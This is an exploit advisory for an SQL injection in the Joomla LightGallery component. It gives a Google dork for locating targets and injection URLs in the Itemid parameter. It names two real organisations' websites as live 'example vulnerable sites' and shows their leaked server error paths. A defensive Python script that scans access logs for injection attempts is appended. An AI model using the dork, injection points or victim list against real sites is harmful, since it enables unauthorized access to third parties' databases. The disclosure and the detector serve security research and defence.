- #########################################################################
- # Exploit Title : Joomla LightGallery Components 1.2.1 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : joompolitan.com
- # Software Download Link : joompolitan.com/lightgallery.html
- joompolitan.com/joomla/free/lightgallery_plugin.2.0.3.zip
- # Software Information Link : extensions.joomla.org/extension/light-gallery/
- tutorial.joompolitan.com/light-gallery-for-joomla.html
- # Software Affected Versions : Joomla Component 1.2.1 and Joomla Plugin 2.0.3
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_lightgallery''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- #########################################################################
- # Description about Software :
- ***************************
- Light Gallery Component for Joomla provides the simplest way for you to create
- responsive galleries on your website. It can generate a gallery from a folder,
- so you do not have to insert the pictures one by one.
- Light Photo Gallery also allows you to create a gallery from pictures or images
- hosted on other websites. Light Gallery enables all lightbox features, and galleries are viewed in a lightbox.
- The Light Gallery Joomla component is compatible with Joomla 2.5.x, Joomla 3.x and later.
- ###########################################################################
- # Impact :
- ***********
- The LightGallery component for Joomla (2.03 and other versions)
- is prone to an SQL injection vulnerability because it
- fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in the application's database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- #########################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_lightgallery&view=category&Itemid=[SQL Injection]
- /index.php?option=com_lightgallery&view=list&cid=[ID-NUMBER]&Itemid=[SQL Injection]
- #########################################################################
- # Example Vulnerable Sites :
- *************************
- [+] vmro-dp.org.mk/index.php?option=com_lightgallery&view=category&Itemid=79
- [+] ttlawcourts.org/index.php?option=com_lightgallery&view=list&cid=24&Itemid=202
- #########################################################################
- # Example SQL Database Error :
- *****************************
- Warning: Invalid argument supplied for foreach() in
- /home/vmrodp24/public_html/components/com_lightgallery
- /views/category/tmpl/default.php on line 16
- Error loading component: com_lightgallery, 1
- Warning: getimagesize(/administrator/components/com_lightgallery
- /lightgallery/th37ce8443-0666-eea9-72b7-000016100028_cj tours lands.jpg)
- [function.getimagesize]: failed to open stream: No such file or directory in
- C:\XAMPP\xampp\htdocs\components\com_lightgallery
- \views\list\tmpl\default.php on line 57
- #########################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #########################################################################
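A defender-side check for the two request patterns listed above, added here as an example and not part of the original advisory: it scans web server access logs for `com_lightgallery` requests whose `Itemid` or `cid` value is not a plain integer. It assumes combined-format access logs and that legitimate traffic only sends integers in these two parameters; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names for com_lightgallery.
# Assumption: legitimate requests only carry plain integers here.
NUMERIC_PARAMS = ("Itemid", "cid")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DIGITS_RE = re.compile(r"[0-9]{1,10}")

def suspicious_params(url):
    """Return [(name, decoded_value)] for non-integer Itemid/cid on com_lightgallery URLs."""
    # parse_qsl percent-decodes values, so encoded quotes and spaces are seen as-is.
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if "com_lightgallery" not in [v for k, v in pairs if k == "option"]:
        return []
    return [(k, v) for k, v in pairs
            if k in NUMERIC_PARAMS and not DIGITS_RE.fullmatch(v)]

def scan_access_log(lines):
    """Return [(line_number, client_ip, name, value)] for each flagged parameter."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a parseable request line
        client_ip = line.split(" ", 1)[0]
        for name, value in suspicious_params(m.group(1)):
            findings.append((n, client_ip, name, value))
    return findings

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_lightgallery&view=category&Itemid=79 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Feb/2019:10:00:05 +0000] "GET /index.php?option=com_lightgallery&view=category&Itemid=79%27 HTTP/1.1" 500 812',
    '198.51.100.7 - - [14/Feb/2019:10:00:09 +0000] "GET /index.php?option=com_lightgallery&view=list&cid=24&Itemid=202%20AND%201=1 HTTP/1.1" 200 4977',
    '203.0.113.4 - - [14/Feb/2019:10:01:00 +0000] "GET /index.php?option=com_content&Itemid=abc HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule can be enforced in front of the application (for example as a WAF or reverse-proxy rule on these two parameters) until the component is removed or fixed.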